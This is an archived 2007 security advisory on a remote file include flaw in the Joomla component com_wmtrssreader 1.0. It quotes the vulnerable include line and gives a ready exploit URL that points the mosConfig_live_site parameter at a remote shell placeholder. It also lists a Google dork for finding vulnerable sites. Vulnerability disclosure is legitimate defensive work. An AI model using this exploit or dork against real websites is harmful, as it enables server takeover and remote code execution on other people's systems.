Security Advisory: wmtrssreader joomla component 1.0 Remote File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Simple Forum (for WordPress) sql-inject exploit (public version)
  Simple Forum (for WordPress) sql-inject exploit (public version)
  Joomla! swMenuFree 4.6 Component Remote File Include
  Several vulnerabilities in CMS Made Simple 1.1.3.1

From: cyber-crime_(at)_sibersavascilar.com <cyber-crime_(at)_sibersavascilar.com>
Date: 12.10.2007
Subject: wmtrssreader joomla component 1.0 Remote File Include Vulnerability

#################################################################################
########################
# wmtrssreader joomla component 1.0 Remote File Include Vulnerability

Component       : com_wmtrssreader version 1.0
Download script : http://www.webmaster-tips.net/flash-rss-reader.html (you must register)
Dicovered by    : Cyber-Crime
Contact         : cyber-crime@hotmail.com
Orginal         : http://www.sibersavascilar.com/category/security

=================================================================================
=================================================

# Vulnerable found in /administrator/components/com_wmtrssreader/admin.wmtrssreader.php

include( "$mosConfig_live_site/components/com_wmtrssreader/about.html" );

# Exploit

http://localhost/path/administrator/components/com_wmtrssreader/admin.
wmtrssreader.php?mosConfig_live_site=sh3ll?

# google dork

inurl:com_wmtrssreader

=================================================================================
=================================================

# Greetz : www.sibersavascilar.com www.sibersavascilar.net www.sibersavascilar.org

=================================================================================
=================================================

#################################################################################
########################